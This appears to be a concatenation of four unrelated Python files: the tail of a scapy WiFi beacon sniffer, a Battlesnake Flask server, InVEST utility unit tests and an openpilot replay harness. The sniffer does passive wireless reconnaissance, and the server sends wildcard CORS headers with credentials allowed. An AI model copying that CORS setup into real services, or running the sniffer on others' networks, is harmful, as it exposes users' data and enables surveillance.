self.headers = ['Channel', 'BSSID', 'SSID']
def run(self):
pass
def checkIface(self, iface):
if (iface in netifaces.interfaces()):
return True
return False
def getStatus(self):
return self._status
def setStatus(self, status):
self._status = status
def getStringFilter(self):
return self._filter
def setStringFilter(self, value):
self._filter = value
def callBackPackets(self, pkt):
if ( pkt.haslayer(Dot11Beacon)):
ssid = pkt[Dot11Elt].info
bssid = pkt[Dot11].addr3
channel = int( ord(pkt[Dot11Elt:3].info))
#print("{} {} {} {}".format(int(channel), enc, bssid, ssid))
self.output.append([channel, bssid, ssid])
os.system("clear")
print(tabulate(self.output, self.headers, tablefmt="simple"))
def main(self):
if not self.checkIface(self.parser_options):
return
p = Process(target = channel_hopper)
p.start()
sniff(iface="wlxc83a35cef744",prn =self.callBackPackets)
teste = sniffer("wlxc83a35cef744")
teste.main()
|
server.py | import logging
import os
import threading
from flask.helpers import make_response, send_file
from training.train import AtomicCounter, Trainer
from training.snake import Snake
import os
from flask import Flask
from flask import request
import server_logic
app = Flask(__name__)
state = server_logic.State(os.getenv("DEBUG", False))
@app.after_request
def after_request_func(response):
response.headers.add('Access-Control-Allow-Credentials', 'true')
response.headers.add('Access-Control-Allow-Headers', '*')
response.headers.add('Access-Control-Allow-Origin', '*')
response.headers.add('Access-Control-Allow-Methods', '*')
return response
@app.get("/")
def handle_info():
"""
This function is called when you register your Battlesnake on play.battlesnake.com
See https://docs.battlesnake.com/guides/getting-started#step-4-register-your-battlesnake
It controls your Battlesnake appearance and author permissions.
For customization options, see https://docs.battlesnake.com/references/personalization
TIP: If you open your Battlesnake URL in browser you should see this data.
"""
return {
"apiversion": "1",
"author": "alecdivito",
"color": "#00FF00", # TODO: Personalize
"head": "default", # TODO: Personalize
"tail": "default", # TODO: Personalize
}
@app.post("/start")
def handle_start():
"""
This function is called everytime your snake is entered into a game.
request.json contains information about the game that's about to be played.
"""
data = request.get_json()
number_of_snakes = len(data['board']['snakes'])
state.newGame(data["game"]["id"], number_of_snakes)
return "ok"
@app.post("/move")
def handle_move():
"""
This function is called on every turn of a game. It's how your snake decides where to move.
Valid moves are "up", "down", "left", or "right".
"""
data = request.get_json()
return {"move": state.move(data["game"]["id"], data)}
@app.post("/end")
def end():
"""
This function is called when a game your snake was in ends.
It's purely for informational purposes, you don't have to make any decisions here.
"""
data = request.get_json()
state.endGame(data["game"]["id"], data)
return "ok"
@app.get("/download")
def download():
"""
This function is used to download training data that maybe stuck on a server
that is training with live data (snakes).
"""
data_file_path = state.build_data_zip_file()
return send_file(data_file_path, as_attachment=True)
if __name__ == "__main__":
logging.getLogger("werkzeug").setLevel(logging.ERROR)
print("Starting Battlesnake Server...")
port = int(os.environ.get("PORT", "8080"))
print("Is this being deployed to productions? {}".format(
"PRODUCATION_SNAKE" in os.environ))
if "MULTI_SNAKE_TRAINING" in os.environ:
state.set_training(True)
state.set_initial_network(os.environ['SNAKE_NETWORK'])
state.set_save_folder(os.environ['SAVE_FOLDER'])
state.set_training_iterations(int(os.environ['ITERATIONS']))
app.run(host="0.0.0.0", port=port, debug=False)
elif bool(os.getenv("PRODUCATION_SNAKE", True)):
# Load all of the script files
is_training = bool(os.getenv("TRAIN", True))
state.set_training(is_training)
state.enable_download_training_data(is_training)
print("This snake is Training? {}".format(is_training))
initial_network = os.getenv(
"SNAKE_NETWORK", "./best_snake/gen:6-fitness:37008")
state.set_initial_network(initial_network)
print("The snake is starting using {}".format(initial_network))
iterations = int(os.getenv("ITERATIONS", 25))
state.set_training_iterations(iterations)
print("Starting training at {} iterations".format(iterations))
state.set_save_folder(os.getenv('SAVE_FOLDER', './network'))
app.run(host="0.0.0.0", port=port, debug=False)
else:
# Start running the training script
print("Starting training network")
print("This testing script will fork the battlesnake binary multiple times and test it on your snake")
# logging.disabled = True
# app.logger.disabled = True
state.set_training(True)
if "TRAIN_SNAKE_NETWORK" in os.environ:
state.set_initial_network(os.environ["TRAIN_SNAKE_NETWORK"])
# app.run(host="0.0.0.0", port=port, debug=False)
kwargs = {'host': '0.0.0.0', 'port': port,
'threaded': True, 'use_reloader': False, 'debug': False}
flask_thread = threading.Thread(
target=app.run, daemon=True, kwargs=kwargs)
flask_thread.start()
command = "./battlesnake play --url http://localhost:8080 -g solo -v"
for _ in range(500):
counter = AtomicCounter()
trainers = []
for index in range(1):
thread = Trainer(index, command, counter, 150, False)
thread.start()
trainers.append(thread)
for thread in trainers:
thread.join()
state.evolve()
print("Training finished")
flask_thread.join()
|
test_utils.py | """Module for testing the natcap.invest.utils module.."""
import codecs
import unittest
import os
import tempfile
import shutil
import logging
import threading
import warnings
import re
import glob
import textwrap
from pygeoprocessing.testing import scm
import pygeoprocessing.testing
from osgeo import gdal
class SuffixUtilsTests(unittest.TestCase):
"""Tests for natcap.invest.utils.make_suffix_string."""
def test_suffix_string(self):
"""Utils: test suffix_string."""
from natcap.invest import utils
args = {'foo': 'bar', 'file_suffix': 'suff'}
suffix = utils.make_suffix_string(args, 'file_suffix')
self.assertEqual(suffix, '_suff')
def test_suffix_string_underscore(self):
"""Utils: test suffix_string underscore."""
from natcap.invest import utils
args = {'foo': 'bar', 'file_suffix': '_suff'}
suffix = utils.make_suffix_string(args, 'file_suffix')
self.assertEqual(suffix, '_suff')
def test_suffix_string_empty(self):
"""Utils: test empty suffix_string."""
from natcap.invest import utils
args = {'foo': 'bar', 'file_suffix': ''}
suffix = utils.make_suffix_string(args, 'file_suffix')
self.assertEqual(suffix, '')
def test_suffix_string_no_entry(self):
"""Utils: test no suffix entry in args."""
from natcap.invest import utils
args = {'foo': 'bar'}
suffix = utils.make_suffix_string(args, 'file_suffix')
self.assertEqual(suffix, '')
class FileRegistryUtilsTests(unittest.TestCase):
"""Tests for natcap.invest.utils.file_registry."""
def test_build_file_registry(self):
"""Utils: test build_file_registry on simple case."""
from natcap.invest import utils
base_dict = {'foo': 'bar', 'baz': '/bart/bam.txt'}
file_registry = utils.build_file_registry([(base_dict, '')], '')
self.assertEqual(
FileRegistryUtilsTests._norm_dict(base_dict),
FileRegistryUtilsTests._norm_dict(file_registry))
def test_build_file_registry_suffix(self):
"""Utils: test build_file_registry on suffix."""
from natcap.invest import utils
base_dict = {'foo': 'bar', 'baz': '/bart/bam.txt'}
file_registry = utils.build_file_registry([
(base_dict, '')], '_suff')
expected_dict = {
'foo': 'bar_suff',
'baz': '/bart/bam_suff.txt'
}
self.assertEqual(
FileRegistryUtilsTests._norm_dict(expected_dict),
FileRegistryUtilsTests._norm_dict(file_registry))
def test_build_file_registry_list_suffix(self):
"""Utils: test build_file_registry on list of files w/ suffix."""
from natcap.invest import utils
base_dict = {
'foo': ['bar', '/bart/bam.txt']
}
file_registry = utils.build_file_registry([
(base_dict, '')], '_suff')
expected_dict = {
'foo': ['bar_suff', '/bart/bam_suff.txt']
}
self.assertEqual(
FileRegistryUtilsTests._norm_dict(expected_dict),
FileRegistryUtilsTests._norm_dict(file_registry))
def test_build_file_registry_path(self):
"""Utils: test build_file_registry on path."""
from natcap.invest import utils
base_dict = {
'foo': 'bar',
'baz': '/bart/bam.txt',
'jab': 'jim'
}
file_registry = utils.build_file_registry([
(base_dict, 'newpath')], '')
expected_dict = {
'foo': 'newpath/bar',
'jab': 'newpath/jim',
'baz': '/bart/bam.txt',
}
self.assertEqual(
FileRegistryUtilsTests._norm_dict(expected_dict),
FileRegistryUtilsTests._norm_dict(file_registry))
def test_build_file_registry_duppath(self):
"""Utils: test build_file_registry ValueError on duplicate paths."""
from natcap.invest import utils
base_dict = {
'foo': 'bar',
'jab': 'bar'
}
with self.assertRaises(ValueError):
_ = utils.build_file_registry([
(base_dict, 'newpath')], '')
def test_build_file_registry_dupkeys(self):
"""Utils: test build_file_registry ValueError on duplicate keys."""
from natcap.invest import utils
base_dict1 = {
'foo': 'bar',
}
base_dict2 = {
'foo': 'bar2',
}
with self.assertRaises(ValueError):
_ = utils.build_file_registry([
(base_dict1, ''), (base_dict2, '')], '')
def test_build_file_registry_invalid_value(self):
"""Utils: test build_file_registry with invalid path type."""
from natcap.invest import utils
base_dict = {
'foo': 'bar',
'baz': None
}
with self.assertRaises(ValueError):
_ = utils.build_file_registry([(base_dict, 'somepath')], '')
@staticmethod
def _norm_dict(path_dict):
"""Take a dictionary of paths and normalize the paths."""
result_dict = {}
for key, path in path_dict.items():
if isinstance(path, str):
result_dict[key] = os.path.normpath(path)
elif isinstance(path, list):
result_dict[key] = [
os.path.normpath(list_path) for list_path in path]
else:
raise ValueError("Unexpected path value: %s", path)
return result_dict
class ExponentialDecayUtilsTests(unittest.TestCase):
"""Tests for natcap.invest.utils.exponential_decay_kernel_raster."""
_REGRESSION_PATH = os.path.join(
os.path.dirname(__file__), '..', 'data', 'invest-test-data',
'exp_decay_kernel')
def setUp(self):
"""Setup workspace."""
self.workspace_dir = tempfile.mkdtemp()
def tearDown(self):
"""Delete workspace."""
shutil.rmtree(self.workspace_dir)
@scm.skip_if_data_missing(_REGRESSION_PATH)
def test_exp_decay_kernel_raster(self):
"""Utils: test exponential_decay_kernel_raster."""
from natcap.invest import utils
expected_distance = 100 # 10 pixels
kernel_filepath = os.path.join(self.workspace_dir, 'kernel_100.tif')
utils.exponential_decay_kernel_raster(
expected_distance, kernel_filepath)
pygeoprocessing.testing.assert_rasters_equal(
os.path.join(
ExponentialDecayUtilsTests._REGRESSION_PATH,
'kernel_100.tif'), kernel_filepath, abs_tol=1e-6)
class SandboxTempdirTests(unittest.TestCase):
def setUp(self):
"""Setup workspace."""
self.workspace_dir = tempfile.mkdtemp()
def tearDown(self):
"""Delete workspace."""
shutil.rmtree(self.workspace_dir)
def test_sandbox_manager(self):
from natcap.invest import utils
with utils.sandbox_tempdir(suffix='foo',
prefix='bar',
dir=self.workspace_dir) as new_dir:
self.assertTrue(new_dir.startswith(self.workspace_dir))
basename = os.path.basename(new_dir)
self.assertTrue(basename.startswith('bar'))
self.assertTrue(basename.endswith('foo'))
# trigger the exception handling for coverage.
shutil.rmtree(new_dir)
class TimeFormattingTests(unittest.TestCase):
def test_format_time_hours(self):
from natcap.invest.utils import _format_time
seconds = 3667
self.assertEqual(_format_time(seconds), '1h 1m 7s')
def test_format_time_minutes(self):
from natcap.invest.utils import _format_time
seconds = 67
self.assertEqual(_format_time(seconds), '1m 7s')
def test_format_time_seconds(self):
from natcap.invest.utils import _format_time
seconds = 7
self.assertEqual(_format_time(seconds), '7s')
class LogToFileTests(unittest.TestCase):
def setUp(self):
self.workspace = tempfile.mkdtemp()
def tearDown(self):
shutil.rmtree(self.workspace)
def test_log_to_file_all_threads(self):
"""Utils: Verify that we can capture messages from all threads."""
from natcap.invest.utils import log_to_file
logfile = os.path.join(self.workspace, 'logfile.txt')
def _log_from_other_thread():
thread_logger = logging.getLogger()
thread_logger.info('this is from a thread')
local_logger = logging.getLogger()
# create the file before we log to it, so we know a warning should
# be logged.
with open(logfile, 'w') as new_file:
new_file.write(' ')
with log_to_file(logfile) as handler:
thread = threading.Thread(target=_log_from_other_thread)
thread.start()
local_logger.info('this should be logged')
local_logger.info('this should also be logged')
thread.join()
handler.flush()
with open(logfile) as opened_logfile:
messages = [msg for msg in opened_logfile.read().split('\n')
if msg if msg]
self.assertEqual(len(messages), 3)
def test_log_to_file_from_thread(self):
"""Utils: Verify that we can filter from a threading.Thread."""
from natcap.invest.utils import log_to_file
logfile = os.path.join(self.workspace, 'logfile.txt')
def _log_from_other_thread():
thread_logger = logging.getLogger()
thread_logger.info('this should not be logged')
thread_logger.info('neither should this message')
local_logger = logging.getLogger()
thread = threading.Thread(target=_log_from_other_thread)
with log_to_file(logfile, exclude_threads=[thread.name]) as handler:
thread.start()
local_logger.info('this should be logged')
thread.join()
handler.flush()
with open(logfile) as opened_logfile:
messages = [msg for msg in opened_logfile.read().split('\n')
if msg if msg]
self.assertEqual(len(messages), 1)
class ThreadFilterTests(unittest.TestCase):
def test_thread_filter_same_thread(self):
from natcap.invest.utils import ThreadFilter
# name, level, pathname, lineno, msg, args, exc_info, func=None
record = logging.LogRecord(
name='foo',
level=logging.INFO,
pathname=__file__,
lineno=500,
msg='some logging message',
args=(),
exc_info=None,
func='test_thread_filter_same_thread')
filterer = ThreadFilter(threading.currentThread().name)
# The record comes from the same thread.
self.assertEqual(filterer.filter(record), False)
def test_thread_filter_different_thread(self):
from natcap.invest.utils import ThreadFilter
# name, level, pathname, lineno, msg, args, exc_info, func=None
record = logging.LogRecord(
name='foo',
level=logging.INFO,
pathname=__file__,
lineno=500,
msg='some logging message',
args=(),
exc_info=None,
func='test_thread_filter_same_thread')
filterer = ThreadFilter('Thread-nonexistent')
# The record comes from the same thread.
self.assertEqual(filterer.filter(record), True)
class MakeDirectoryTests(unittest.TestCase):
"""Tests for natcap.invest.utils.make_directories."""
def setUp(self):
"""Make temporary directory for workspace."""
self.workspace_dir = tempfile.mkdtemp()
def tearDown(self):
"""Delete workspace."""
shutil.rmtree(self.workspace_dir)
def test_make_directories(self):
"""utils: test that make directories works as expected."""
from natcap.invest import utils
directory_list = [
os.path.join(self.workspace_dir, x) for x in [
'apple', 'apple/pie', 'foo/bar/baz']]
utils.make_directories(directory_list)
for path in directory_list:
self.assertTrue(os.path.isdir(path))
def test_make_directories_on_existing(self):
"""utils: test that no error if directory already exists."""
from natcap.invest import utils
path = os.path.join(self.workspace_dir, 'foo', 'bar', 'baz')
os.makedirs(path)
utils.make_directories([path])
self.assertTrue(os.path.isdir(path))
def test_make_directories_on_file(self):
"""utils: test that value error raised if file exists on directory."""
from natcap.invest import utils
dir_path = os.path.join(self.workspace_dir, 'foo', 'bar')
os.makedirs(dir_path)
file_path = os.path.join(dir_path, 'baz')
file = open(file_path, 'w')
file.close()
with self.assertRaises(OSError):
utils.make_directories([file_path])
def test_make_directories_wrong_type(self):
"""utils: test that ValueError raised if value not a list."""
from natcap.invest import utils
with self.assertRaises(ValueError):
utils.make_directories(self.workspace_dir)
class GDALWarningsLoggingTests(unittest.TestCase):
def setUp(self):
self.workspace = tempfile.mkdtemp()
def tearDown(self):
shutil.rmtree(self.workspace)
def test_log_warnings(self):
"""utils: test that we can capture GDAL warnings to logging."""
from natcap.invest import utils
logfile = os.path.join(self.workspace, 'logfile.txt')
# this warning should go to stdout.
gdal.Open('this_file_should_not_exist.tif')
with utils.log_to_file(logfile) as handler:
with utils.capture_gdal_logging():
# warning should be captured.
gdal.Open('file_file_should_also_not_exist.tif')
handler.flush()
# warning should go to stdout
gdal.Open('this_file_should_not_exist.tif')
with open(logfile) as opened_logfile:
messages = [msg for msg in opened_logfile.read().split('\n')
if msg if msg]
self.assertEqual(len(messages), 1)
class PrepareWorkspaceTests(unittest.TestCase):
def setUp(self):
self.workspace = tempfile.mkdtemp()
def tearDown(self):
shutil.rmtree(self.workspace)
def test_prepare_workspace(self):
"""utils: test that prepare_workspace does what is expected."""
from natcap.invest import utils
workspace = os.path.join(self.workspace, 'foo')
try:
with utils.prepare_workspace(workspace,
'some_model'):
warnings.warn('deprecated', UserWarning)
gdal.Open('file should not exist')
except Warning as warning_raised:
self.fail('Warning was not captured: %s' % warning_raised)
self.assertTrue(os.path.exists(workspace))
logfile_glob = glob.glob(os.path.join(workspace, '*.txt'))
self.assertEqual(len(logfile_glob), 1)
self.assertTrue(
os.path.basename(logfile_glob[0]).startswith('InVEST-some_model'))
with open(logfile_glob[0]) as logfile:
logfile_text = logfile.read()
# all the following strings should be in the logfile.
expected_string = 'file should not exist: No such file or directory'
self.assertTrue(expected_string in logfile_text) # gdal error captured
self.assertEqual(len(re.findall('WARNING', logfile_text)), 1)
self.assertTrue('Elapsed time:' in logfile_text)
class BuildLookupFromCSVTests(unittest.TestCase):
"""Tests for natcap.invest.utils.build_lookup_from_csv."""
def setUp(self):
"""Make temporary directory for workspace."""
self.workspace_dir = tempfile.mkdtemp()
def tearDown(self):
"""Delete workspace."""
shutil.rmtree(self.workspace_dir)
def test_build_lookup_from_csv(self):
"""utils: test build_lookup_from_csv."""
from natcap.invest import utils
table_str = 'a,b,foo,bar,_\n0.0,x,-1,bar,apple\n'
table_path = os.path.join(self.workspace_dir, 'table.csv')
with open(table_path, 'w') as table_file:
table_file.write(table_str)
result = utils.build_lookup_from_csv(
table_path, 'a', to_lower=True)
expected_dict = {
0.0: {
'a': 0.0,
'b': 'x',
'foo': -1.0,
'bar': 'bar',
'_': 'apple'
},
}
self.assertDictEqual(result, expected_dict)
def test_unique_key_not_first_column(self):
"""utils: test success when key field is not first column."""
from natcap.invest import utils
csv_text = ("desc,lucode,val1,val2\n"
"corn,1,0.5,2\n"
"bread,2,1,4\n"
"beans,3,0.5,4\n"
"butter,4,9,1")
table_path = os.path.join(self.workspace_dir, 'table.csv')
with open(table_path, 'w') as table_file:
table_file.write(csv_text)
result = utils.build_lookup_from_csv(
table_path, 'lucode', to_lower=True)
expected_result = {
1: {'desc': 'corn', 'val1': 0.5, 'val2': 2, 'lucode': 1},
2: {'desc': 'bread', 'val1': 1, 'val2': 4, 'lucode': 2},
3: {'desc': 'beans', 'val1': 0.5, 'val2': 4, 'lucode': 3},
4: {'desc': 'butter', 'val1': 9, 'val2': 1, 'lucode': 4}}
self.assertDictEqual(result, expected_result)
def test_non_unique_keys(self):
"""utils: test error is raised if keys are not unique."""
from natcap.invest import utils
csv_text = ("lucode,desc,val1,val2\n"
"1,corn,0.5,2\n"
"2,bread,1,4\n"
"2,beans,0.5,4\n"
"4,butter,9,1")
table_path = os.path.join(self.workspace_dir, 'table.csv')
with open(table_path, 'w') as table_file:
table_file.write(csv_text)
with self.assertRaises(ValueError):
utils.build_lookup_from_csv(table_path, 'lucode', to_lower=True)
def test_missing_key_field(self):
"""utils: test error is raised when missing key field."""
from natcap.invest import utils
csv_text = ("luode,desc,val1,val2\n"
"1,corn,0.5,2\n"
"2,bread,1,4\n"
"3,beans,0.5,4\n"
"4,butter,9,1")
table_path = os.path.join(self.workspace_dir, 'table.csv')
with open(table_path, 'w') as table_file:
table_file.write(csv_text)
with self.assertRaises(KeyError):
utils.build_lookup_from_csv(table_path, 'lucode', to_lower=True)
def test_nan_holes(self):
"""utils: test empty strings returned when missing data is present."""
from natcap.invest import utils
csv_text = ("lucode,desc,val1,val2\n"
"1,corn,0.5,2\n"
"2,,1,4\n"
"3,beans,0.5,4\n"
"4,butter,,1")
table_path = os.path.join(self.workspace_dir, 'table.csv')
with open(table_path, 'w') as table_file:
table_file.write(csv_text)
result = utils.build_lookup_from_csv(
table_path, 'lucode', to_lower=True)
expected_result = {
1: {'desc': 'corn', 'val1': 0.5, 'val2': 2, 'lucode': 1},
2: {'desc': '', 'val1': 1, 'val2': 4, 'lucode': 2},
3: {'desc': 'beans', 'val1': 0.5, 'val2': 4, 'lucode': 3},
4: {'desc': 'butter', 'val1': '', 'val2': 1, 'lucode': 4}}
self.assertDictEqual(result, expected_result)
def test_nan_row(self):
"""utils: test NaN row is dropped."""
from natcap.invest import utils
csv_text = ("lucode,desc,val1,val2\n"
"1,corn,0.5,2\n"
",,,\n"
"3,beans,0.5,4\n"
"4,butter,9,1")
table_path = os.path.join(self.workspace_dir, 'table.csv')
with open(table_path, 'w') as table_file:
table_file.write(csv_text)
result = utils.build_lookup_from_csv(
table_path, 'lucode', to_lower=True)
expected_result = {
1.0: {'desc': 'corn', 'val1': 0.5, 'val2': 2, 'lucode': 1.0},
3.0: {'desc': 'beans', 'val1': 0.5, 'val2': 4, 'lucode': 3.0},
4.0: {'desc': 'butter', 'val1': 9, 'val2': 1, 'lucode': 4.0}}
self.assertDictEqual(result, expected_result)
def test_column_subset(self):
"""utils: test column subset is properly returned."""
from natcap.invest import utils
csv_text = ("lucode,desc,val1,val2\n"
"1,corn,0.5,2\n"
"2,bread,1,4\n"
"3,beans,0.5,4\n"
"4,butter,9,1")
table_path = os.path.join(self.workspace_dir, 'table.csv')
with open(table_path, 'w') as table_file:
table_file.write(csv_text)
result = utils.build_lookup_from_csv(
table_path, 'lucode', to_lower=True, column_list=['val1', 'val2'])
expected_result = {
1: {'val1': 0.5, 'val2': 2, 'lucode': 1},
2: {'val1': 1, 'val2': 4, 'lucode': 2},
3: {'val1': 0.5, 'val2': 4, 'lucode': 3},
4: {'val1': 9, 'val2': 1, 'lucode': 4}}
self.assertDictEqual(result, expected_result)
def test_trailing_comma(self):
"""utils: test a trailing comma on first line is handled properly."""
from natcap.invest import utils
csv_text = ("lucode,desc,val1,val2\n"
"1,corn,0.5,2,\n"
"2,bread,1,4\n"
"3,beans,0.5,4\n"
"4,butter,9,1")
table_path = os.path.join(self.workspace_dir, 'table.csv')
with open(table_path, 'w') as table_file:
table_file.write(csv_text)
result = utils.build_lookup_from_csv(
table_path, 'lucode', to_lower=True)
expected_result = {
1: {'desc': 'corn', 'val1': 0.5, 'val2': 2, 'lucode': 1},
2: {'desc': 'bread', 'val1': 1, 'val2': 4, 'lucode': 2},
3: {'desc': 'beans', 'val1': 0.5, 'val2': 4, 'lucode': 3},
4: {'desc': 'butter', 'val1': 9, 'val2': 1, 'lucode': 4}}
self.assertDictEqual(result, expected_result)
def test_trailing_comma_second_line(self):
"""utils: test a trailing comma on second line is handled properly."""
from natcap.invest import utils
csv_text = ("lucode,desc,val1,val2\n"
"1,corn,0.5,2\n"
"2,bread,1,4,\n"
"3,beans,0.5,4\n"
"4,butter,9,1")
table_path = os.path.join(self.workspace_dir, 'table.csv')
with open(table_path, 'w') as table_file:
table_file.write(csv_text)
result = utils.build_lookup_from_csv(
table_path, 'lucode', to_lower=True)
expected_result = {
1: {'desc': 'corn', 'val1': 0.5, 'val2': 2, 'lucode': 1},
2: {'desc': 'bread', 'val1': 1, 'val2': 4, 'lucode': 2},
3: {'desc': 'beans', 'val1': 0.5, 'val2': 4, 'lucode': 3},
4: {'desc': 'butter', 'val1': 9, 'val2': 1, 'lucode': 4}}
self.assertDictEqual(result, expected_result)
def test_results_lowercase_non_numeric(self):
"""utils: text handling of converting to lowercase."""
from natcap.invest import utils
csv_file = os.path.join(self.workspace_dir, 'csv.csv')
with open(csv_file, 'w') as file_obj:
file_obj.write(textwrap.dedent(
"""
header1,HEADER2,header3
1,2,bar
4,5,FOO
"""
).strip())
lookup_dict = utils.build_lookup_from_csv(
csv_file, 'header1', to_lower=True)
self.assertEqual(lookup_dict[4]['header3'], 'foo')
self.assertEqual(lookup_dict[1]['header2'], 2)
def test_results_uppercase_numeric_cast(self):
"""utils: test handling of uppercase, num. casting, blank values."""
from natcap.invest import utils
csv_file = os.path.join(self.workspace_dir, 'csv.csv')
with open(csv_file, 'w') as file_obj:
file_obj.write(textwrap.dedent(
"""
header1,HEADER2,header3,missing_column,
1,2,3,
4,FOO,bar,
"""
).strip())
lookup_dict = utils.build_lookup_from_csv(
csv_file, 'header1', to_lower=False)
self.assertEqual(lookup_dict[4]['HEADER2'], 'FOO')
self.assertEqual(lookup_dict[4]['header3'], 'bar')
self.assertEqual(lookup_dict[1]['header1'], 1)
def test_csv_dialect_detection_semicolon_delimited(self):
"""utils: test that we can parse semicolon-delimited CSVs."""
from natcap.invest import utils
csv_file = os.path.join(self.workspace_dir, 'csv.csv')
with open(csv_file, 'w') as file_obj:
file_obj.write(textwrap.dedent(
"""
header1;HEADER2;header3;
1;2;3;
4;FOO;bar;
"""
).strip())
lookup_dict = utils.build_lookup_from_csv(
csv_file, 'header1', to_lower=False)
self.assertEqual(lookup_dict[4]['HEADER2'], 'FOO')
self.assertEqual(lookup_dict[4]['header3'], 'bar')
self.assertEqual(lookup_dict[1]['header1'], 1)
def test_csv_utf8_bom_encoding(self):
"""utils: test that CSV read correctly with UTF-8 BOM encoding."""
from natcap.invest import utils
csv_file = os.path.join(self.workspace_dir, 'csv.csv')
# writing with utf-8-sig will prepend the BOM
with open(csv_file, 'w', encoding='utf-8-sig') as file_obj:
file_obj.write(textwrap.dedent(
"""
header1,HEADER2,header3
1,2,bar
4,5,FOO
"""
).strip())
# confirm that the file has the BOM prefix
with open(csv_file, 'rb') as file_obj:
self.assertTrue(file_obj.read().startswith(codecs.BOM_UTF8))
lookup_dict = utils.build_lookup_from_csv(
csv_file, 'header1')
# assert the BOM prefix was correctly parsed and skipped
self.assertEqual(lookup_dict[4]['header2'], 5)
self.assertEqual(lookup_dict[4]['header3'], 'foo')
self.assertEqual(lookup_dict[1]['header1'], 1)
def test_csv_latin_1_encoding(self):
"""utils: test that CSV read correctly with Latin-1 encoding."""
from natcap.invest import utils
csv_file = os.path.join(self.workspace_dir, 'csv.csv')
with codecs.open(csv_file, 'w', encoding='iso-8859-1') as file_obj:
file_obj.write(textwrap.dedent(
"""
header 1,HEADER 2,header 3
1,2,bar1
4,5,FOO
"""
).strip())
lookup_dict = utils.build_lookup_from_csv(
csv_file, 'header 1')
self.assertEqual(lookup_dict[4]['header 2'], 5)
self.assertEqual(lookup_dict[4]['header 3'], 'foo')
self.assertEqual(lookup_dict[1]['header 1'], 1)
|
process_replay.py | #!/usr/bin/env python3
import os
import threading
import importlib
import shutil
if "CI" in os.environ:
tqdm = lambda x: x
else:
from tqdm import tqdm
from cereal import car, log
from selfdrive.car.car_helpers import get_car
import selfdrive.manager as manager
import cereal.messaging as messaging
from common.params import Params
from cereal.services import service_list
from collections import namedtuple
ProcessConfig = namedtuple('ProcessConfig', ['proc_name', 'pub_sub', 'ignore', 'init_callback', 'should_recv_callback'])
class FakeSocket:
def __init__(self, wait=True):
self.data = []
self.wait = wait
self.recv_called = threading.Event()
self.recv_ready = threading.Event()
def receive(self, non_blocking=False):
if non_blocking:
return None
if self.wait:
self.recv_called.set()
self.recv_ready.wait()
self.recv_ready.clear()
return self.data.pop()
def send(self, data):
if self.wait:
self.recv_called.wait()
self.recv_called.clear()
self.data.append(data)
if self.wait:
self.recv_ready.set()
def wait_for_recv(self):
self.recv_called.wait()
class DumbSocket:
def __init__(self, s=None):
if s is not None:
dat = messaging.new_message()
dat.init(s)
self.data = dat.to_bytes()
def receive(self, non_blocking=False):
return self.data
def send(self, dat):
pass
class FakeSubMaster(messaging.SubMaster):
def __init__(self, services):
super(FakeSubMaster, self).__init__(services, addr=None)
self.sock = {s: DumbSocket(s) for s in services}
self.update_called = threading.Event()
self.update_ready = threading.Event()
self.wait_on_getitem = False
def __getitem__(self, s):
# hack to know when fingerprinting is done
if self.wait_on_getitem:
self.update_called.set()
self.update_ready.wait()
self.update_ready.clear()
return self.data[s]
def update(self, timeout=-1):
self.update_called.set()
self.update_ready.wait()
self.update_ready.clear()
def update_msgs(self, cur_time, msgs):
self.update_called.wait()
self.update_called.clear()
super(FakeSubMaster, self).update_msgs(cur_time, msgs)
self.update_ready.set()
def wait_for_update(self):
self.update_called.wait()
class FakePubMaster(messaging.PubMaster):
def __init__(self, services):
self.data = {}
self.sock = {}
self.last_updated = None
for s in services:
data = messaging.new_message()
try:
data.init(s)
except:
data.init(s, 0)
self.data[s] = data.as_reader()
self.sock[s] = DumbSocket()
self.send_called = threading.Event()
self.get_called = threading.Event()
def send(self, s, dat):
self.last_updated = s
if isinstance(dat, bytes):
self.data[s] = log.Event.from_bytes(dat)
else:
self.data[s] = dat.as_reader()
self.send_called.set()
self.get_called.wait()
self.get_called.clear()
def wait_for_msg(self):
self.send_called.wait()
self.send_called.clear()
dat = self.data[self.last_updated]
self.get_called.set()
return dat
def fingerprint(msgs, fsm, can_sock):
print("start fingerprinting")
fsm.wait_on_getitem = True
# populate fake socket with data for fingerprinting
canmsgs = [msg for msg in msgs if msg.which() == "can"]
can_sock.recv_called.wait()
can_sock.recv_called.clear()
can_sock.data = [msg.as_builder().to_bytes() for msg in canmsgs[:300]]
can_sock.recv_ready.set()
can_sock.wait = False
# we know fingerprinting is done when controlsd sets sm['pathPlan'].sensorValid
fsm.update_called.wait()
fsm.update_called.clear()
fsm.wait_on_getitem = False
can_sock.wait = True
can_sock.data = []
fsm.update_ready.set()
print("finished fingerprinting")
def get_car_params(msgs, fsm, can_sock):
can = FakeSocket(wait=False)
sendcan = FakeSocket(wait=False)
canmsgs = [msg for msg in msgs if msg.which() == 'can']
for m in canmsgs[:300]:
can.send(m.as_builder().to_bytes())
_, CP = get_car(can, sendcan)
Params().put("CarParams", CP.to_bytes())
def radar_rcv_callback(msg, CP):
if msg.which() != "can":
return []
elif CP.radarOffCan:
return ["radarState", "liveTracks"]
radar_msgs = {"honda": [0x445], "toyota": [0x19f, 0x22f], "gm": [0x474],
"chrysler": [0x2d4]}.get(CP.carName, None)
if radar_msgs is None:
raise NotImplementedError
for m in msg.can:
if m.src == 1 and m.address in radar_msgs:
return ["radarState", "liveTracks"]
return []
CONFIGS = [
ProcessConfig(
proc_name="controlsd",
pub_sub={
"can": ["controlsState", "carState", "carControl", "sendcan", "carEvents", "carParams"],
"thermal": [], "health": [], "liveCalibration": [], "driverMonitoring": [], "plan": [], "pathPlan": [], "gpsLocation": [],
"model": [],
},
ignore=[("logMonoTime", 0), ("valid", True), ("controlsState.startMonoTime", 0), ("controlsState.cumLagMs", 0)],
init_callback=fingerprint,
should_recv_callback=None,
),
ProcessConfig(
proc_name="radard",
pub_sub={
"can": ["radarState", "liveTracks"],
"liveParameters": [], "controlsState": [], "model": [],
},
ignore=[("logMonoTime", 0), ("valid", True), ("radarState.cumLagMs", 0)],
init_callback=get_car_params,
should_recv_callback=radar_rcv_callback,
),
ProcessConfig(
proc_name="plannerd",
pub_sub={
"model": ["pathPlan"], "radarState": ["plan"],
"carState": [], "controlsState": [], "liveParameters": [],
},
ignore=[("logMonoTime", 0), ("valid", True), ("plan.processingDelay", 0)],
init_callback=get_car_params,
should_recv_callback=None,
),
ProcessConfig(
proc_name="calibrationd",
pub_sub={
"cameraOdometry": ["liveCalibration"]
},
ignore=[("logMonoTime", 0), ("valid", True)],
init_callback=get_car_params,
should_recv_callback=None,
),
]
